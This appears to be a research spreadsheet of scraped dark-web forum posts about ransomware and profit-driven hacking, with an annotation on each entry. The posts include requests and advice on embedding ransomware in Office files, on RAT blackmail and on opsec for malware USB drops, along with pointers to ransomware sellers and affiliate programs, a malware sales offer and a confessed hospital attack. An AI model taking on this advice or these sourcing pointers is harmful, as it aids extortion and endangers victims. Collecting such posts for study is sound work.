    <t>ransomware embedded in word or excel doc? i have the connections for good ransomware and know some evasion techniques for macro which i can improve;spreading trojans and building a botnet?;blackmail with rat?;i believe sql injections still work but i would assume most websites would be secure and check against it as its simple to prevent?;my starting goal would be to make 1 -3k per month what is the most viable way?;i have time and money and can learn anything</t>
  </si>
  <si>
    <t>Post asking if they can embed ransomware in a word/excel doc</t>
  </si>
  <si>
    <t>/u/ieuncrwier</t>
  </si>
  <si>
    <t>15/09/2020 11:21</t>
  </si>
  <si>
    <t>9cc6746e7b6eab53d8aa</t>
  </si>
  <si>
    <t>What are the most viable way to make money hacking?</t>
  </si>
  <si>
    <t>65 days 12:55:00</t>
  </si>
  <si>
    <t>spreading rat to gleam accounts to use, sell, or trade them.;;ransomware with malicious word document as you discussed.;;in a nutshell do everything that will generate you some sort of income instead of selectively picking one here or there. go fucking wild and then count on crypto to blast your ass off to the moon where the cocaine is pure and the escorts strictly female living in mans body.</t>
  </si>
  <si>
    <t>15/09/2020 20:20</t>
  </si>
  <si>
    <t>0 days 08:59:00</t>
  </si>
  <si>
    <t>you don't know how na��ve your post comes across as. you have much to learn, but it's fine. we all start somewhere.;;in fact, learning is the secret to hacking. one must have an insatiable hunger for understanding to be a notable hacker. that's why there is such a distaste for so cal"script kiddies". use without understanding is;antithetical;to hacking. use without understanding is what creates the mechanisms that we use to take control. it's a battle of wits.;;so ignore the ransomware sellers and prebuilt trojans. ignore the rats. they only serve to obscure your learning, and you;really;don't need any of them.;;you say you have time and can learn anything. well, go and actually learn networking. learn the whole stack. learn a programming language well, all the way down to it's internals. pick some popular framework and map all it's dependencies, identify the ones that seem neglected and study all the code. understand it and find ways to take control. nurture creative thought.;;that's a lot of work, but even getting 10% of the way there will bring you so much success. three thousand euros in a month is nothing for a hacker. you could do bug bounties while smoking weed in your drawers and make more than that without even committing cybercrime. the path you're on is not profitable. you are the profit for someone else. it's helpless non-hackers selling binaries to other helpless non-hackers while everyone involved struggles to make a few thousand dollars spamming forums while they watch mr.robot.</t>
  </si>
  <si>
    <t>/u/luksy</t>
  </si>
  <si>
    <t>16/09/2020 02:03</t>
  </si>
  <si>
    <t>0 days 00:41:00</t>
  </si>
  <si>
    <t>i am always learning and i strongly agree that learning the fundementals behind what you are doing is extremely important!</t>
  </si>
  <si>
    <t>Post asking if they can embed ransomware in a word/excel doc - user encourages the learning of the fundimentals</t>
  </si>
  <si>
    <t>16/09/2020 04:46</t>
  </si>
  <si>
    <t>the most viable way is getting a high paying job doing cybersecurity..</t>
  </si>
  <si>
    <t>/u/exmachinalibertas</t>
  </si>
  <si>
    <t>16/09/2020 07:53</t>
  </si>
  <si>
    <t>i mean making such information public is opposite of useful. same way darkside/darkmatter gave away $20000 to two charities, and one had to return the money.</t>
  </si>
  <si>
    <t>Post about hacktivism stating it can be a double edged sword as some people may not accept money from illicit means</t>
  </si>
  <si>
    <t>22/09/2021 01:56</t>
  </si>
  <si>
    <t>/d/hacktivism</t>
  </si>
  <si>
    <t>5eb9ab4d8e1adb11462f</t>
  </si>
  <si>
    <t>What comes into your mind when you think or hear about hacktivism?</t>
  </si>
  <si>
    <t>12 days 23:50:00</t>
  </si>
  <si>
    <t>make a post on this dread, i'd recommend low tier ransomware. as in keep it under $1m+</t>
  </si>
  <si>
    <t>Post stating ransomware makes the most money</t>
  </si>
  <si>
    <t>6de38678bf697be0f587</t>
  </si>
  <si>
    <t>What hacking field makes the most money</t>
  </si>
  <si>
    <t>72 days 18:52:00</t>
  </si>
  <si>
    <t>i'm having mixed thoughts about some things;;;is a ransomware builder better than, taking time to code a ransomware, and the commandandcontrol center.;;i wanna get into ransomware, but i dont know any guides, or barely anything about it.;;could someone give me some tips?</t>
  </si>
  <si>
    <t>User asking if a ransomware builder is better or worse then coing a ransomware from scratch</t>
  </si>
  <si>
    <t>/u/GruesomeSec</t>
  </si>
  <si>
    <t>4c1a643558d7f2db3b56</t>
  </si>
  <si>
    <t>What is better</t>
  </si>
  <si>
    <t>0 days 12:09:00</t>
  </si>
  <si>
    <t>wth is a ransomware builder</t>
  </si>
  <si>
    <t>/u/Humanman</t>
  </si>
  <si>
    <t>0 days 09:02:00</t>
  </si>
  <si>
    <t>tool that builds ransomware for you, you pick all the options you want and you get a nice shiny binary at the end</t>
  </si>
  <si>
    <t>/u/sharkpulses</t>
  </si>
  <si>
    <t>0 days 02:15:00</t>
  </si>
  <si>
    <t>builder is likely to be more widely used and therefore more likely to be detected.</t>
  </si>
  <si>
    <t>what is needed for making ransomware?</t>
  </si>
  <si>
    <t>User asking what is needed for making ransomware</t>
  </si>
  <si>
    <t>b11223939499a9fe92d2</t>
  </si>
  <si>
    <t>What is needed for ransomware?</t>
  </si>
  <si>
    <t>8 days 01:54:00</t>
  </si>
  <si>
    <t>im wondering the same info. it seems like its a frowned upon subject on this site to talk about. i dont mind paying for a service or the package but i never get a response here for good links or anything</t>
  </si>
  <si>
    <t>i don't think its frowned upon. it's more or less the moral police likes to come out and tell you whats right and whats not right while preaching to you.</t>
  </si>
  <si>
    <t>ability to generate unique public-key pair for locking files while avoiding exposure of the private key and disabling system by encryption of critical files :)</t>
  </si>
  <si>
    <t>thx i will look into the dead man switch option on qubes , seems a good idea ; otherwise compartmentalization on qubes and kernel protection means it's impossible to perform a ransoware attack ? my thoughts were to have a personal ransomware on a key and activate it in case of emergency but i'm not sure about it and doesn't know much about ransomware softwares</t>
  </si>
  <si>
    <t>Posts about Opsec (related to ransomware)</t>
  </si>
  <si>
    <t>/u/Whiteknight777</t>
  </si>
  <si>
    <t>19/05/2021 16:11</t>
  </si>
  <si>
    <t>c0d6c2558dbf65305f77</t>
  </si>
  <si>
    <t>What is the perfect panic-button feature to obliterate your whole OPSEC</t>
  </si>
  <si>
    <t>1 days 19:13:00</t>
  </si>
  <si>
    <t>lets say i have usb drives with malware on it.;when someone inserts it, then click on a file, it makes the computer join a botnet.;the software may be keylogger, ransomware, etc.;i'd like to litter these usb drives in corporate parking lots and populated areas.;if i seem to "lose" them when walking through an area, i doubt it'd ever be tied to me.;what type of opsec are we talking for distributing these?;or is that not necessary?</t>
  </si>
  <si>
    <t>User asking what opsec is required to perform a successful USB drop</t>
  </si>
  <si>
    <t>/u/carding54823482</t>
  </si>
  <si>
    <t>f0dd740e5c8f54b07509</t>
  </si>
  <si>
    <t>What opsec is required to physically give out usb drives with malware?</t>
  </si>
  <si>
    <t>i have learnt some hacking, but i don't know what side i should keep. i've never hacked for bad, or good. i've only tested my knowledge on ctfs and my own computers as i have 4 computers and one hacking laptop. i don't know if i shall be whitehat such as bug bounty programs etc, grey hat or blackhat. i am doing this all for money. so, can you tell me which one is better whitehat, greyhat and blackhet based on my 3 most valuable assets: money, time, effort.;thanks in advance!</t>
  </si>
  <si>
    <t>User asking whether they should become a black or white hat hacker</t>
  </si>
  <si>
    <t>/u/cl4ycl4y</t>
  </si>
  <si>
    <t>21/03/2022 17:12</t>
  </si>
  <si>
    <t>d0295d2a0a9e02f6ff7f</t>
  </si>
  <si>
    <t>What side shall I keep?</t>
  </si>
  <si>
    <t>2 days 08:01:00</t>
  </si>
  <si>
    <t>if you want to earn money doing something illegal, probably double extortion ransomware you would have a little more trouble to launder your money. otherwise, you can just report the vulnerability to one of those bug bounty websites and hope that you can earn enough money.</t>
  </si>
  <si>
    <t>21/03/2022 17:32</t>
  </si>
  <si>
    <t>you can be whitehat at day, blackhat at night and greyhat on the weekends, that depends on you. good luck!</t>
  </si>
  <si>
    <t>/u/xcist</t>
  </si>
  <si>
    <t>21/03/2022 17:43</t>
  </si>
  <si>
    <t>if you want to do hacking ....to obtain money .... you will  nevere make money ...;;hacking is not about money bro...;;hacking is the art to access information , data that you are supposed to not be allowed to have access....;;many want to learn hacking because they are guided by making money .....;;if you want to make money ...go on social media and prostitute yourself ..you will earn more money then from hacking.....;;;hacking is not for making money ...at all ........ if you will understand this .... you will solve your money problem ....</t>
  </si>
  <si>
    <t>23/03/2022 11:05</t>
  </si>
  <si>
    <t>1 days 10:19:00</t>
  </si>
  <si>
    <t>oh please, lol. id say the two driving forces for people who learn hacking is money and politics. there is lots of money to be made hacking. depends on how much money you want and the skills you have. father of 2 who is just trying to keep their family comfortable? white hat. low risk, moderate money if you have the skills. (80-150k starting depending on degree/certs/location) not enough money? grey, do some bug bounties on the side, have a normal work day. you can easily clear 200k. or you can be black if even thats not enough (but depending on location/skills) you live in a country that doesnt prosecute hacking outside of your nationstate? do it. find zero days and sell them to nations/companies.</t>
  </si>
  <si>
    <t>/u/LilithDaddies</t>
  </si>
  <si>
    <t>24/03/2022 01:13</t>
  </si>
  <si>
    <t>0 days 11:20:00</t>
  </si>
  <si>
    <t>its sad seeing no one reply to you so imma just drop down a few ideas that might work (also it isnt best to talk about black hat hackers when dread is full of grey/white hat hackers);;you could do sql injections to poorly made websites with logins, you could brute force cellular phones, brute force the wi-fi. manipulate the weaknesses of the wi-fi and try to be middle man (kind of outdated but i dont see a reason for it not to work for cheap places) you could then do social engineering, phishing,malware/ransomware creation;;if you know all of these stuff, then i don't see a reason as to why someone who works at the breach companies or crypto exchanged shouldn't hire you (but you may need to learn a bit of c++);;but overall, being a black hat hacker isn't something to be praised about, nor its something nice. be a grey hat hacker</t>
  </si>
  <si>
    <t>User asking whether they should become a black or white hat hacker - User providing information about what a grey/black hacker would entail</t>
  </si>
  <si>
    <t>19/03/2022 10:07</t>
  </si>
  <si>
    <t>4fe52ef3acd95c242da7</t>
  </si>
  <si>
    <t>What would be a Black Hat roadmap?</t>
  </si>
  <si>
    <t>1 days 01:58:00</t>
  </si>
  <si>
    <t>2 days 15:21:00</t>
  </si>
  <si>
    <t>thank you so much for the reply!;so i know about bruteforcing and sql injections and mim attacks.but i want something more!;;i dont say black hat as pure profit group ,but more like the activist side.like the ones taking down russian companies for example.;;could you please share a place with only black hat hackers? i tried some forums like cryptbb but they are all full of script kiddies.;;thank you again for the answer! viva la italia!</t>
  </si>
  <si>
    <t>19/03/2022 12:37</t>
  </si>
  <si>
    <t>0 days 02:30:00</t>
  </si>
  <si>
    <t>ah yes that's a beautiful way to use your skills!!! that should be considered as a white hacker. sadly i don't know any forums or groups where black hat hackers hang nearby, if i find one soon then i'll reply yo your message! and yeah man, script kiddies are everywhere these day. you're welcome and viva la italia my friend!</t>
  </si>
  <si>
    <t>19/03/2022 23:49</t>
  </si>
  <si>
    <t>0 days 11:12:00</t>
  </si>
  <si>
    <t>a friend of mine was working at the hospital. i infected computers in the hospital with ransomware, but i guess many patients died. if god or karma is real, i'm screwed.;tell your worst crimes here.</t>
  </si>
  <si>
    <t>User confessing their worst crime via ransomware (infecting a hosptial and possible causing deaths)</t>
  </si>
  <si>
    <t>/u/DrugLordHacker</t>
  </si>
  <si>
    <t>26/08/2022 23:16</t>
  </si>
  <si>
    <t>7439c57f0abcb000e0de</t>
  </si>
  <si>
    <t>What's The Worst Crime You've Ever Commited?</t>
  </si>
  <si>
    <t>9 days 06:21:00</t>
  </si>
  <si>
    <t>greetings;/d/malware;. searching for onion links that sell ransomware such as revil or maze. anyone know where i can find these ransoms for sale or sold as a service ?</t>
  </si>
  <si>
    <t>User asking for onion links to groups that sell raas</t>
  </si>
  <si>
    <t>/u/Freedomrobot</t>
  </si>
  <si>
    <t>ab9633a4ee566088f8b3</t>
  </si>
  <si>
    <t>Where can I find REvil or Maze ransomware</t>
  </si>
  <si>
    <t>35 days 10:44:00</t>
  </si>
  <si>
    <t>contact me if you want to buy one . it is fully customisable and with key being sent to an email address you provide. of course fud. contact me for more if you are still interested.</t>
  </si>
  <si>
    <t>/u/pinxho</t>
  </si>
  <si>
    <t>25 days 05:07:00</t>
  </si>
  <si>
    <t>there is an affiliation program in xss.is for revil.</t>
  </si>
  <si>
    <t>/u/n13m4nd</t>
  </si>
  <si>
    <t>0 days 18:31:00</t>
  </si>
  <si>
    <t>when i try to go to;/d/redeemer;it says that the community is closed.;what happened and where can i find or download the ransomware now?;seems like;/u/cerebrate;was banned for rule violation.;was the ransomware backdoored or something?</t>
  </si>
  <si>
    <t>User asking for access to redeemer ransomware group</t>
  </si>
  <si>
    <t>/u/TriBlade5055</t>
  </si>
  <si>
    <t>22/09/2022 10:13</t>
  </si>
  <si>
    <t>8eeaee71697bf1a4072f</t>
  </si>
  <si>
    <t>Where can I find Redeemer?</t>
  </si>
  <si>
    <t>3 days 01:52:00</t>
  </si>
  <si>
    <t>hey mate i have been looking for so long now without any luck or help, would you mind letting me know if you find anything worthwhile regarding purchasing ransomware or downloading it please :);;i am very keen and need a good crypter, really really intrigued</t>
  </si>
  <si>
    <t>23/09/2022 09:43</t>
  </si>
  <si>
    <t>i used redeemer but not the newest 2.0 version that i've seen on the internet;;it was free to download and use but you had to pay the dev like 20% of what you earned to decrypt the encrypted files;;thanks @cyberjagu i will check it out</t>
  </si>
  <si>
    <t>23/09/2022 12:12</t>
  </si>
  <si>
    <t>0 days 02:29:00</t>
  </si>
  <si>
    <t>i am fine with paying the dev % i just want the ransomware to fucking work you know what i mean?</t>
  </si>
  <si>
    <t>23/09/2022 12:25</t>
  </si>
  <si>
    <t>check cryptbb, bears the same name</t>
  </si>
  <si>
    <t>/u/mido4f</t>
  </si>
  <si>
    <t>24/09/2022 00:54</t>
  </si>
  <si>
    <t>can find at cryptbb or hacktown</t>
  </si>
  <si>
    <t>/u/LULUXK3</t>
  </si>
  <si>
    <t>25/09/2022 12:05</t>
  </si>
  <si>
    <t>1 days 11:11:00</t>
  </si>
  <si>
    <t>i don't know how to do carding personally but if someone stole my grandmas identity and used her credit cards to buy a bunch of shit, it's not like she'd be on the hook for all the money that was spent on her card. the credit card company has to eat it.;;so yeah it's probably a pain in the ass that granny has to go through the process of dealing with the credit card company in whatever way this sort of fraud requires, but at the same time i might even argue that the benefit of fucking credit card companies over as much as carders do might even outweigh the minor inconvenience that having her identity stolen causes my grandma.;;using ransomware on individuals is fucked up, but again if someone is able to use ransomware on a corporation or a fucked up city government or police department. again, i'd say it's def possible that the ratio of individuals to disreputable entities getting fucked over might justify the proliferation of ransomware.;;and unless someone can figure out away to use cp to destroy walmart, cp will remain unjustifiable.</t>
  </si>
  <si>
    <t>User discussing the ethical ramifications of ransomware vs other cybercrime activities, asking if ransomware is worth it ethically</t>
  </si>
  <si>
    <t>/u/Agent_Torange</t>
  </si>
  <si>
    <t>71b97996cc2dc0f377ed</t>
  </si>
  <si>
    <t>Where do you draw the line?</t>
  </si>
  <si>
    <t>35 days 19:29:00</t>
  </si>
  <si>
    <t>similarly, those people who ransomware hospital systems for their own financial benefit. people who steal the life savings from your average retiree, that kinda shit gets me heated.;;+1</t>
  </si>
  <si>
    <t>/u/HaggeredDaz</t>
  </si>
  <si>
    <t>hi, i'm constantly hearing about different companies being hacked and sensitive information getting leaked but i can never seem to find where to buy said information. does anyone know of any sites that post or sell leaked information?;thanks</t>
  </si>
  <si>
    <t>User asking where to find leak sites for ransomware data</t>
  </si>
  <si>
    <t>/u/netplay42</t>
  </si>
  <si>
    <t>15/08/2022 00:32</t>
  </si>
  <si>
    <t>842eeb77d9c3d742615e</t>
  </si>
  <si>
    <t>Where to Find Data Leaks?</t>
  </si>
  <si>
    <t>1 days 16:26:00</t>
  </si>
  <si>
    <t>ransomware sites, just search ransomware websites on ahmia search engine, you will get many links there</t>
  </si>
  <si>
    <t>15/08/2022 04:29</t>
  </si>
  <si>
    <t>0 days 03:57:00</t>
  </si>
  <si>
    <t>/d/fraud;;;/d/ransomware;;only posts relating to this site in this subdread allowed! posts here are manually reviewed before public posting!</t>
  </si>
  <si>
    <t>14/03/2022 15:24</t>
  </si>
  <si>
    <t>/d/Dread</t>
  </si>
  <si>
    <t>524a026787b899020585</t>
  </si>
  <si>
    <t>Where to Share my Links?</t>
  </si>
  <si>
    <t>if it helps, you can build my ransomware to test it out. check out;/d/redeemer;.</t>
  </si>
  <si>
    <t>Redeemer ransomware creator advertising their ransomware</t>
  </si>
  <si>
    <t>a25ae7129192a735e544</t>
  </si>
  <si>
    <t>White can I Download Malware on purpose?</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;in cybersecurity, dwell time is the time between an attacker���s initial penetration of an organization���s environment and the point at which the organization finds out the attacker is there. in an ideal world, that time would be measured in moments. if everything were perfect, the security operations center would get an alert that the intrusion detection system (ids) had identified an attacker as their automated endpoint detection and response (edr) nullified the intruder before the cybercriminal did any damage. but we don���t live in an ideal world.;;industry surveys over the years have shown dwell time ranging from a (sadly rare) best case of a couple of minutes to a worst case of hundreds of days. the average dwell time ��� depending on region, industry and who is generating the report ��� has varied widely. and while a couple of months is better than over 100 days, it is still a relative eternity given the speed at which business moves andbvious question is: why is dwell time still so high? but the answer is not always simple or clear. many security vendors will claim that their solution can detect an intruder in real time or, more realistically, within a few minutes of an intruder getting into the environment. and the fact is that many of them actually can.;;but only in ideal conditions: the environment needs to be set up to favor early detections, the solution needs to be installed and configured correctly, and the security operations team needs to have the correct training and supporting processes to make the most of their tools. that ���correct configuration��� theme needs to play across the entire security stack since modern security solutions do not operate in a vacuum.;;for organizations that have everything in place with the right tools, training, processes, and policies, it is possible they can honestly say, ���we would know in minutes��� when asked, ���how long would it take you to catch an intruder?�ds that most organizations, even ones that believe they are well prepared for an intrusion, are not detecting an attacker anywhere nearly as quickly as they would like.;;for other organizations with less mature cybersecurity infrastructure and secops teams, the answer is more likely to fall somewhere between ���days��� and ���when we read about it on the news.��� for those who work at a small company, the first indication they may have a breach is when they see ransomware messages pop up on their desktops and their network grinds to a halt. small organizations often lack the resources to hire a dedicated information security resource, let alone a fully equipped team and the security stack they need to adequately protect the environment.;;managed security service providers (mssps) can help smaller organizations deal with a lack of in-house resources, but even mssps can struggle with identifying a subtle attack. security professionals who do penetration testing have demonstrated that it ito skirt around many of the extant security solutions on both the network and endpoints. that doesn���t even address attackers who leverage stolen credentials to masquerade as a legitimate user.;;social engineering and phishing schemes have shown time and again that users can be a weak link in the security chain. while most common drift-net style phishing attacks are caught by spam filters and are easily recognized by users, more focused attacks have a much greater chance to succeed. cast-net attacks, which target people in a specific organization, are much more effective. they are especially useful when an attacker doesn���t care who they get, as long as they can get a foothold. spear-phishing attacks are, by nature, highly focused and can be closely tied to a well-researched social engineering effort. they take more work on the attacker���s part but frequently have a much greater chance of success.;;when attackers can compromise a user account, they have an easy in. if they are careful and�low and slow��� model, they can often stay under the radar of conventional systems. the same is true no matter how an attacker gains their credentials. whether it���s through purchasing credentials on the dark web from a massive data breach, brute-forcing passwords or through exploiting a flaw in some login protocol, once they are in, the dwell time clock has started.;;finding and eliminating these intruders is where the real challenge lies. even a skilled secops team using a mature security stack can miss a clever intruder ��� or has missed clever intruders, as the ongoing volume of high-profile breaches attests. it's not that they are not capable; rather, it���s that the sheer volume of alerts means it is easy to lose subtle clues in the flood.;;some tools do a better job than others of revealing attackers. deception technologies, for example, return high-confidence alerts when an attacker touches them, as no one should be touching the decoys deception relies on. unfortunately, if an attacker never takes the bait, the system will never see them. security analytics is a better option that can pinpoint an intruder���s activities out of the noise by focusing on user behaviors using machine learning to recognize outlier behaviors.;;reducing dwell time can be a complex challenge as attackers leverage a range of organic and machine vectors to get their foothold and use subtlety to remain undetected. but it is not an insurmountable challenge. with the right tools, training, user education and processes, it���s possible to reduce the chance of a breach and raise the possibility of catching an attacker early if the intruder does manag</t>
  </si>
  <si>
    <t>Article discussing the dwell time between the attack and discovery has not changed</t>
  </si>
  <si>
    <t>e21535aa167f5ba037d8</t>
  </si>
  <si>
    <t>Why The Dwell Time Of Cyberattacks Has Not Changed</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;as known attacks fade away, threat intelligence remains one of the top three investment priorities in it security for indian companies. over the last few years and specifically during the ongoing covid-19 pandemic, enterprises have constantly been bombarded with advanced and unknown threats that they are not equipped to deal with. suddenly, employees had to be shifted to work-from-home due to a nation-wide lockdown. due to lack of preparedness, confidential databases, endpoint devices, and cloud workloads have been targeted resulting in ransomware attacks and data thefts.;;most of the attacks are voluminous, targeted, multi-vector, polymorphic, signature-less, and importantly unknown; making it challenging for enterprises to prevent these attacks. hence is the need for a cybersecurity framework that leverages threat intelligence and can identify and respond to advanced threats thereby creating an improved security posture.;;;what is cyber threat intelligence?;;cyber threat intelligence refers to an organization���s ability to prevent or mitigate cyber-attacks. enterprises use intelligence products and services built on evidence-based knowledge to prepare, prevent, and identify known and unknown cyber threats by leveraging on reliable resources. threat intelligence aggregates, correlates, and analyzes threat data from multiple sources to create an improved defense mechanism.;;the need for threat intelligence is to build:;;1. proactive and predictive security posture (not reactive) within enterprises;2. improved threat detection and faster remediation and mitigation;3. better decision making during and after a cyber intrusion;;;the role of threat intelligence in 7 stage threat protection;;today, enterprises need a 360-degree security framework that protects digital assets, workloads, and endpoints. this framework needs to be banked on proactive security architecture with threat intelligence as its backbone. frost &amp; sullivan strongly believes the current cybersecurity architefor enterprises needs to be restructured to the needs of modern cyber threats and built on the 7 stage threat protection.;;the 7 stage threat protection uses threat intelligence products to address three key areas:;;1. enrich other security technologies;2. vulnerability prioritization;3. open, deep, and dark web monitoring;;threat intelligence products tie-up with the installed base of security products within the enterprise such as siem, firewall, unified threat management, ids/ips, secure web gateway, and more. to pick up and prioritize the most vulnerable threats, the threat intelligence engine gathers data across all available sources (web, email, endpoint, and network) and performs analysis to help create a simple metric for evaluating vulnerabilities.;;the intelligence solution inspects the open sources (publicly available data on the internet), deep web (data which is locked behind the secure logins or paywalls), and dark web (data on the internet that is encrypted and used in trading illegal goods or services) to protect data everywhere it resides.;;;how to build cyber threat intelligence;;there is no single product that provides complete end-to-end threat intelligence against all types of cyber-threats. rather, threat intelligence is a collection of security technologies and tools that work hand-in-hand with each other to provide event correlation, threat monitoring, and incident response in real-time. while siem has been the core of the threat intelligence structure for enterprises for several years, when it comes to identifying unknown attacks, enterprises need the ability to capture and act upon the right security information.;;advanced security technologies like incident forensics, user entity analytics, and threat intelligence platform work in tandem with log management and security management (like siem) to deliver the best possible proactive security outcome. most of these tools and techniques are empowered with next-generation technologies like artificial intelligence, machine learning, big data analytics, and robotics process automation that are most effective against non-signature and file-less threat actors.;;to combat modern cyber threats, enterprises need to take advantage of forward-looking security services like managed detection and response (mdr), advanced threat identification, endpoint detection and response (edr), threat hunting, and red/blue teaming services.;;;industry verticals benefiting the most from cyber threat intelligence;;bfsi: the banking, financial services, and insurance (bfsi) industry remain one of the most targeted businesses in india. phishing attacks, privilege misuse, malware infections, digital card skimming, ddos attacks, and data leakage are some of the top-most threat vectors for the banking sector. cyber criminals use a variety of techniques to steal the login credentials of employees and customers. enterprises can benefit from threat intelligence where data, user and login patterns are being analyzed to indicate a potential threat and thereby alert it teams about the possible breach.;;it/ites: india is a destination for several large technologies and outsourcing firms. each of these companies becomes a massive customer data repository globally. hackers are constantly on the lookout to target and steal sensitive customer information. of late, ransomware attacks have become common incidents across the it and ites companies apart from zero-day attacks and phishing campaigns. most outsourcing companies have already realized the need to invest in updated next-generation security technologies and concepts like mdr, user and entity behavior analytics (ueba), e-discovery, incident response, dark web monitoring, and forensics which are intelligence-driven and help enterprises stay ahead in the race against cyber-attacks.;;critical infrastructure: the critical infrastructure sector is the backbone of any country. without power, water, transportation, communications, defense, and emergency services, a country comes to a grinding halt. often state-sponsored cyber criminals target these infrastructure sectors and try to paralyze the economy of a country. threat intelligence products help secure industrial iot (iiot), scada systems, industrial control systems (ics), and smart devices from devastating data breaches, ip theft, and device hijacking. using robotics process automation (rpa), software-defined security (sds), and zero trust security, critical infrastructure can be secured to a larger extent making it easy for enterprises to monitor and manage security more easily.;;;the way ahead in cybersecurity;;threat intelligence is soon expected to become fundamental to cyber defense. as security incidents escalate daily and cybersecurity becomes the no.1 priority for businesses, enterprises need to invest and adopt security technologies that are contextual, behavior-driven, and cater to future needs. legacy security tools would cease to exist, making way for intelligence-based cybersecurity products ��� something enterprises have long been looking to</t>
  </si>
  <si>
    <t>Article discussing the exposure of intellegence and the threat it has in cyber security</t>
  </si>
  <si>
    <t>26fb3b6ae16287310d27</t>
  </si>
  <si>
    <t>Why Threat Intelligence is the Next Big Thing in Cybersecurity?</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the dark web economy is thriving &amp; that���s bad news for everyone else. in the wake of the global pandemic, everyone is trying to do more with less. economic challenges are creating budget shortfalls that require creative thinking for businesses to overcome in almost every sector.;;but while many facets of the global economy are beginning to shift into recovery mode, there���s one economic engine that has powered explosive growth that shows no signs of slowing down: cybercrime. the dark web economy is growing by leaps and bounds. that may be great news for cybercriminals but it���s terrible news for businesses.;;;there���s no recession on the dark web;;the dark web economy has seen major shifts in the past year as new opportunities for cybercrime created new profitability for everyone from major ransomware gangs to cybercrime-as-a-service gig workers. demand for all kinds of skilled cybercrime work is high ��� experts estimate that 90% of posts  from buyers looking to contract someone for hacking services. an estimated 69% of those dark web forum hiring posts were looking for cybercriminals to do some website hacking, while another 21% were looking for bad actors who could obtain specifically targeted user or client databases.;;everything else that the researchers noted around hiring on dark web forums was small potatoes. about 7% of the forum posts measured were ads for hackers looking for work. even in a booming economy, there are several reasons for hackers to be advertising their services. some hackers have a very specialized skillset, like specialists in social media scams or brand impersonation campaigns. advertising their services uniquely helps them find better-paying work. others may be new to the gig and trying to build their reputation or make contacts. still others are drifters that move in and out of cybercrime gangs.;;not all ���hackers��� are actually hackers. putative cybercriminals can also profit from selling their own le over 2% of the forum posts measured by the researchers were made by cybercriminal developers who were selling the tools of the trade like password crackers, payment skimmers, malware, ransomware and other hacking programs. hackers also use those forums as a way to meet people interested in planning or participating cyberattacks ��� about 1% of the surveyed dark web forum posts were made by hackers seeking hackers for a team-up.;;;everything has a price;;what are cybercrime buyers hiring hackers for? the most popular category of ���job��� postings is from buyers who want to hire hackers to meddle with retail operations to facilitate payment jacking. they���re hiring hackers to inject malicious javascript code into websites to catch data entered by shoppers. those buyers are also interested in hacked databases from retail outfits. hacking these companies usually costs between $50 and $2,000. this spells disaster for many organizations ��� 60% of companies go out of business afte can go much higher when direct financial hits are involved.;;websites are a perennially popular target. buyers that want to acquire web shells, access to the administration interfaces of websites, or ready-made exploits that can be used to inject sql code are always hiring. this has been an especially hot category as the sudden shift to remote work created vulnerabilities to exploit. a slow, lurching update cycle for many businesses has also left exploitable openings. hacking a website can cost as much as $10,000. a task like web shells can range in cost from a few cents each to $1,000 per instance depending on the difficulty and time commitment involved for the hacker. while custom databases are priced between $100 and $20,000, or between $5 and $50 per 1,000 entries.;;buyers are hungry for databases, creating opportunities for enterprising hackers. those enterprising hackers are having a field day snatching up data from companies that haven���t addressed vulnerabilities. sometimes, hackers don��et for a buyer, they���ll sell pre-hacked, freshly unlocked databases that can be priced as high as $20,000, or up to $50 per 1,000 entry. typically, those entries include some personally identifying information (pii) in each entry like username, email address, full name, phone number, home address, date of birth and occasionally social security and identification numbers. boutique hacking, sometimes involving assistance from malicious insiders, like accessing a custom database is available at a premium price: between $100 and $20,000, or between $5 and $50 per 1,000 entries ��� definitely not c</t>
  </si>
  <si>
    <t>Article about as to why the increase in the scale of the Dark Web is not an issue</t>
  </si>
  <si>
    <t>26/04/2021 19:30</t>
  </si>
  <si>
    <t>880eefc4c087dc9fc266</t>
  </si>
  <si>
    <t>Why You Should(n't) Worry About the Booming Dark Web Economy</t>
  </si>
  <si>
    <t>i was ~14 when i first hacked my school. at ~16 i hacked another few more schools and one mental facility. and those are just two highlights. no special tools or knowledge needed.;;i have access to thousands of data of children, and thousands of mentally ill patients and their problems, or even family situations. very sensitive information.;;and how did i did that? mostly just human weakness, weak passwords, lack of basic protection, low-level employees having too much of access, too much of physical trust/faith.;;i could leak all those documents. i could blackmail all these organizations. i could probably even cause some suicides or ruin someones life. i won't, but i still have all the papers stored inside encrypted drive, who knows when will i need them? will i ever need them?;;anyway.... my point is, i will never trust a psychologist... the fact that he uses his personal computer to store all data patients and to play candy-crush saga during his free-time? or even worse ... stored offline - in his office where a janitor has full-time access? how could i ever trust someone like that?;;now it may not be a problem, but in the future?;oh sorry, we won't hire you because you allegedly had depression 10 years ago.;or even worse, we do not allow you to have kids because you reported to be mentally unstable.;;this is not paranoia. this is (sad?) reality. and if i was able to do this - this young, how many more people can? and how many people store data and never publish them?;;and ths is why you should never trust any organization especially when they have you id'ed/kyced with anything too sensitive.;;and this is only gonna get worse. just check the news. how many times a ransomware infected hospital or police station? this is just the tip of the iceberg.;;;knowledge is power;privacy will become rarity;maintain your privacy proactively!;;;obviously, don't become too obsessed about privacy either. it's not healthy... just think about it... its impossible to protect everything!;</t>
  </si>
  <si>
    <t>Hacker discussing why they will never fully trust medical personel with their data due to what they know hackers can acheive</t>
  </si>
  <si>
    <t>hacker (individual) / debate</t>
  </si>
  <si>
    <t>cd3c4489443471855700</t>
  </si>
  <si>
    <t>Why will I never trust any organzation / psycholgists with my ID</t>
  </si>
  <si>
    <t>0 days 15:14:00</t>
  </si>
  <si>
    <t>like spyware, viruses, ransomware etc, i have seen many darknet markets offering them but they seem like scams, i have heard that exploit.in is good but are there any other sites onion or not that have a real marketplace for them. thanks.</t>
  </si>
  <si>
    <t>User where people are able to buy the latest ransomware</t>
  </si>
  <si>
    <t>/u/CougarLover69</t>
  </si>
  <si>
    <t>27/10/2021 16:59</t>
  </si>
  <si>
    <t>6e7bdc4df639d2eb92b3</t>
  </si>
  <si>
    <t>Would like to know where hackers buy the latest malware</t>
  </si>
  <si>
    <t>they don't buy , they build them!</t>
  </si>
  <si>
    <t>27/10/2021 17:29</t>
  </si>
  <si>
    <t>i get that, but also there are those who sell their malware for profit, where do they sell them? not all hackers build them, there must be a marketplace where they trade them, legitimately (well not scamming anyways) and for realistic prices.</t>
  </si>
  <si>
    <t>27/10/2021 17:35</t>
  </si>
  <si>
